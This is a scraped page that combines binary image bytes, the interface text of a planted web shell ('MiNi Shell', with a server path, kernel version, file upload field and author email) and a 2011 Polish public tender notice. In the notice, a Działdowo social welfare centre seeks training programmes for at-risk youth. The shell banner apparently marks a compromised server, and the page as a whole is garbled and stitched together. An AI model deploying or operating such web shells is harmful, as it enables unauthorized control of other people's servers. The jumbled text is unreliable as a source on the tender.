JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/103628-N-2011.html

<p class="kh_header"><b>Działdowo: Zorganizowanie i przeprowadzenie działań związanych z realizacją Programu Aktywności Lokalnej dla  28 osób - młodzieży w wieku 15 - 24 lat, zagrożonej wykluczeniem  społecznym.</b><br>
<b>Numer ogłoszenia: 103628 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Działdowie , ul. Władysława Jagiełły 30, 13-200 Działdowo, woj. warmińsko-mazurskie, tel. 23 6972178, faks 23 6870981.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzialdowo-mops.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie działań związanych z realizacją Programu Aktywności Lokalnej dla  28 osób - młodzieży w wieku 15 - 24 lat, zagrożonej wykluczeniem  społecznym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zorganizowanie i przeprowadzenie działań związanych z realizacją Programu Aktywności Lokalnej.
Uczestnikami projektu - działań w realizowanym przedmiocie zamówienia jest 28 osób. Jest to młodzież ucząca się i nie ucząca się w wieku 15 - 24 lat, zagrożona wykluczeniem  społecznym.
Zamówienie jest realizowane w ramach i na potrzeby projektu Zmienić siebie realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działania 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
3.1. Zamówienie obejmuje:
1) przeprowadzenie szkoleń z zakresu Programu Aktywności Lokalnej, wymienionych w pkt. 3.2. SIWZ - dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, na warunkach określonych w pkt. 3.3.1 SIWZ,
2) opracowanie materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie i bindowanie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu - na warunkach określonych w pkt. 3.3.2. SIWZ
3) zapewnienie sali szkoleniowej - na warunkach wskazanych w pkt. 3.3.3. SIWZ
4) zapewnienie w trakcie szkoleń cateringu - na warunkach wskazanych w pkt. 3.3.4. SIWZ
5) zapewnienie odpowiednich warunków w trakcie realizacji zadań w formie wyjazdowej - na warunkach określonych w pkt. 3.3.5. SIWZ
6) zapewnienie współpracy z animatorem lokalnym - na warunkach wskazanych w pkt. 3.3.6 SIWZ
3.2. Zakres tematyczny szkoleń, cel, ilość grup szkoleniowych, ilość godzin szkoleniowych, orientacyjne terminy szkoleń:
3.2.1. Szkolenie nr 1:
Trening komunikacji interpersonalnej Dogadać się pod napięciem.
Cel: pogłębienie świadomości komunikacyjnej w relacjach, rozwijanie umiejętności skutecznej komunikacji, w tym zachowań asertywnych.
Tematyka zajęć:
-integracja zespołu
-sztuka aktywnego słuchania i przekazu komunikatów
-asertywność jako postawa przeciwdziałania uległości i agresji
-sztuka nawiązywania kontaktu
-efektywne prowadzenie dialogu w relacjach
-zdolność udzielania i korzystania ze wsparcia w bliskich relacjach
-budowanie porozumienia międzypokoleniowego (rodzice - dorastające lub dorosłe dzieci).
Trening ten musi też objąć trening zadaniowy w terenie polegający na wyjeździe do parku linowego.
Wykonawca przeszkoli 2 grupy szkoleniowe  w wymiarze 25 godzin dla każdej grupy szkoleniowej (łącznie 50 godzin dydaktycznych). Szkolenia będą przeprowadzone w terminie - lipiec 2011r.
3.2.2. Szkolenie nr 2:
Warsztaty aktywizacji zawodowej Znaleźć zapłon
Cel: wzrost wiedzy i doskonalenie umiejętności w zakresie planowania własnego rozwoju edukacyjno-zawodowego oraz poruszania się po rynku pracy
Tematyka zajęć 
-rozwijanie samowiedzy na temat własnego kapitału społecznego
-umiejętność planowania rozwoju zawodowego
-sztuka przygotowania i uczestniczenia w rozmowach kwalifikacyjnych
-zdolność korzystania z usług infrastruktury instytucjonalnej, związanej z zatrudnieniem
-wzmacnianie motywacji i poczucia samoskuteczności w odniesieniu do decyzji zawodowych
Pierwszy dzień warsztatów to wizyta studyjna w przedsiębiorstwie z nietypowej branży.
Wykonawca przeszkoli 2 grupy szkoleniowe  w wymiarze 21 godzin dla każdej grupy szkoleniowej (łącznie 42 godziny dydaktyczne). Szkolenia będą przeprowadzone w terminie - sierpień 2011r.
3.2.3. Szkolenie nr 3:
Trening twórczego uczenia się i zapamiętywania Fitness dla mózgu
Cel: rozwijanie umiejętności twórczej i efektywnej nauki, wzmacnianie motywacji wewnętrznej do rozwoju poznawczego.
Tematyka zajęć :
-rozwijanie umiejętności efektywnego planowania i organizacji nauki
-budowanie osobistych systemów motywacyjnych
-rozwijanie myślenia symbolicznego, dedukcyjnego, analogicznego
-doskonalenie pamięci poprzez efektywne mnemotechniki
-sztuka wykorzystywania zabawy w nauce
Trening odbywać się będzie w formie wyjazdowej.
Wykonawca przeszkoli 2 grupy szkoleniowe  w wymiarze 20 godzin dla każdej grupy szkoleniowej (łącznie 40 godzin dydaktycznych). Szkolenia będą przeprowadzone w terminie - sierpień 2011r.
3.2.4. Szkolenie nr 4:
Warsztaty edukacyjno-profilaktyczne Na dobrej fazie ze sobą i z innymi. 
Cel: wzrost świadomości i wiedzy z zakresu odpowiedzialnego kształtowania osobistych relacji i mechanizmów zachowań. 
Tematyka zajęć : 
-profilaktyka uzależnień (alkohol, narkotyki, hazard, gry komputerowe)
-przeciwdziałanie przemocy i agresji 
-rozwijanie świadomości i poszanowania własnej seksualności w bliskich relacjach
-profilaktyka chorób przenoszonych drogą płciową (HIV/AIDS i inne)
-przeciwdziałanie zagrożeniom cyberprzestrzeni
Wykonawca przeszkoli 2 grupy szkoleniowe  w wymiarze 12 godzin dla każdej grupy szkoleniowej (łącznie 24 godziny dydaktyczne). Szkolenia będą przeprowadzone w terminie - sierpień 2011r.
3.2.5. Szkolenie nr 5:
Trening zachowań interwencyjnych z elementami samoobrony Siła bez agresji 
Cel: trening łączy w sobie profilaktykę zachowań agresywnych, naukę kontroli swoich emocji i zachowań oraz sztukę samoobrony w sytuacjach napaści fizycznej. 
Tematyka zajęć:
-odkrywanie pozytywnych stron siły fizycznej oraz form jej ekspresji i zastosowania
-znajomość ogólnych zasady zachowania własnego bezpieczeństwa w sytuacji napaści
-umiejętność asertywnego reagowania na atak werbalny i prowadzenia dialogu
-reagowanie na napaść fizyczną - elementy samoobrony, efektywne poszukiwanie pomocy i wsparcia w sytuacjach napaści
-kształtowanie wewnętrznej samodyscypliny, zainteresowań i pasji
Wykonawca przeszkoli 2 grupy szkoleniowe  w wymiarze 16 godzin dla każdej grupy szkoleniowej (łącznie 32 godziny dydaktyczne). Szkolenia będą przeprowadzone w terminie - lipiec 2011r.
3.3. Wymagania w zakresie realizacji zmówienia:
3.3.1. Szkolenia - Zamawiający wymaga, aby:
-Wykonawca zapewnił trenera/trenerów o odpowiednich kwalifikacjach i doświadczeniu,
-Wykonawca przeprowadził ewaluację działań z uwzględnieniem rezultatów,
-szkolenia odbywały się na terenie miasta Działdowo (nie dotyczy szkoleń wyjazdowych)
-Trener/Wykładowca zaczynał i kończył warsztaty/treningi o wyznaczonej w harmonogramie godzinie
-Wykonawca dokonał ubezpieczenia NW od następstw nieszczęśliwych wypadków wszystkich uczestników na czas trwania zajęć również wyjazdowych,
-po przeprowadzeniu szkolenia Wykonawca:
- wystawił dla uczestników szkoleń imienne zaświadczenia o udziale w szkoleniu, opatrzone znakami zgodnymi z wytycznymi Ministra Rozwoju Regionalnego z dnia 13 sierpnia 2007 roku w zakresie informacji i promocji, tj. logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo flagi Unii Europejskiej oraz logo Miejskiego Ośrodka Pomocy Społecznej w Działdowie
3.3.2. Materiały szkoleniowe - Zamawiający wymaga, aby:
-przekazane materiały szkoleniowe opatrzone były znakami zgodnymi z wytycznymi Ministra Rozwoju Regionalnego z dnia 13 sierpnia 2007 roku w zakresie informacji i promocji, tj. logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo flagi Unii Europejskiej oraz logo Miejskiego Ośrodka Pomocy Społecznej w Działdowie
-materiały szkoleniowe zawierały tematykę prowadzonych zajęć oraz wskazówki do realizacji założonych celów - zajęć,
-Wykonawca zapewnił wszystkim uczestnikom szkolenia materiały szkoleniowe, w tym także 1 komplet dla Zamawiającego.
3.3.3. Sala szkoleniowa - Zamawiający wymaga, aby:
-Wykonawca zagwarantował i zapewnił w ramach szkoleń salę szkoleniową na terenie miasta Działdowo.
Koszty wynajmu sali pokryje Wykonawca realizujący przedmiot zamówienia.
3.3.4. Catering - Zamawiający wymaga, aby:
-Wykonawca zapewnił w trakcie każdego szkolenia catering w postaci:
- obiadu dla uczestników szkolenia;
ciepłe danie (mięso lub ryba)
dodatki (ziemniaki lub ryż lub kasza lub frytki)
surówki
kompot
- przerw kawowych (w trakcie, których podawane będą zimne i ciepłe napoje, ciasteczka)
3.3.5. Realizacja zadań w formie wyjazdowej - Zamawiający wymaga, aby:
-uczestnicy biorący udział w tej formie zajęć byli zakwaterowani w pokojach 2,3,4 - osobowych z dostępem do łazienki, 
-uczestnicy mieli zapewnione 3 pełne posiłki (śniadanie, obiad, kolację) 
-Wykonawca zapewnił uczestnikom dojazd na miejsce szkolenia i powrót do miejsca zamieszkania,
3.3.6. Współpraca z animatorem lokalnym - Zamawiający wymaga, aby:
-Wykonawca umożliwił nieodpłatnie udział animatora lokalnego w wybranych zajęciach. Wybór zajęć należeć będzie do animatora po uzgodnieniu i akceptacji Zamawiającego,
-obecność animatora lokalnego na zajęciach do 50 % godzin dydaktycznych zrealizowanych przez Wykonawcę, 
-kadra prowadząca szkolenia w ramach realizacji przedmiotu zamówienia winna współpracować z animatorem lokalnym poprzez zapoznanie z tematyką prowadzonych zajęć, udzielanie wskazówek, wymiana doświadczeń i wniosków w celu zaktywizowania młodzieży. 
3.4. Wykładowcy/trenerzy biorący udział w realizacji zamówienia muszą posiadać:
- minimum 2-letnie doświadczenie zawodowe w pracy z młodzieżą ze środowisk zagrożonych wykluczeniem społecznym,
- wykazać i udokumentować uczestnictwo w co najmniej dwóch obozach w formie wyjazdowej profilaktyczno-terapeutycznych dla młodzieży, objętych tematyką przedmiot zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach (wg zasady spełnia-nie spełnia), o których mowa w pkt. 9 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach (wg zasady spełnia-nie spełnia), o których mowa w pkt. 9 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach (wg zasady spełnia-nie spełnia), o których mowa w pkt. 9 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach (wg zasady spełnia-nie spełnia), o których mowa w pkt. 9 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach (wg zasady spełnia-nie spełnia), o których mowa w pkt. 9 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1
2.	Oświadczenie o spełnianiu warunków z art. 22 ust. 1 i art. 24 ust. 1 i 2 - załącznik nr 2
3.	Potwierdzenie, że każda z osób uczestniczących w wykonywaniu zamówienia posiada minimum 2-letnie doświadczenie zawodowe w pracy z młodzieżą ze środowisk zagrożonych wykluczeniem społecznym . - załącznik nr 4.
4.	Wykaz, że osoby uczestniczące w wykonywaniu zamówieniu, uczestniczyły w co najmniej dwóch obozach w formie wyjazdowej profilaktyczno-terapeutycznych dla młodzieży, objętych tematyką przedmiot zamówienia. (np. referencje) - złącznik nr 3a.
5.	Oświadczenie dotyczące wpisu do rejestru instytucji szkoleniowych na dzień 31.01.2011r., prowadzonego przez właściwy Wojewódzki Urząd Pracy dla siedziby Wykonawcy. - załącznik nr 6.
6.	Zaakceptowany projekt umowy - załącznik nr 7
7.	Procedurę nadzoru wewnętrznego mającego na celu podnoszenie jakości prowadzonego szkolenia.
8.	Procedurę sprawdzania efektów szkolenia.
9.	Wzór zaświadczenia, certyfikatu potwierdzającego ukończenie szkolenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Doświadczenie w przeprowadzeniu szkoleń - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególnie uzasadnionych przypadkach Wykonawca może dokonać wymiany osób, które zaproponował w ofercie jako wykładowców. W takiej sytuacji Wykonawca wskaże Zamawiającemu osobę o co najmniej porównywalnych i nie niższych kwalifikacjach, wykształceniu i doświadczeniu (dostarczy obowiązkowo w tym celu dokumenty poświadczające kwalifikacje, wykształcenie, doświadczenie - wykaz). Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób. Zmiana kadry wymaga zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzialdowo-mops.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Działdowie ul. Wł. Jagiełly 30, 13-200 Działdowo pok. nr 1-sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Działdowie ul. Wł. Jagieły 30, 13-200 Działdowo, sekretariat - parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach i na potrzeby projektu Zmienić siebie realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działania 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com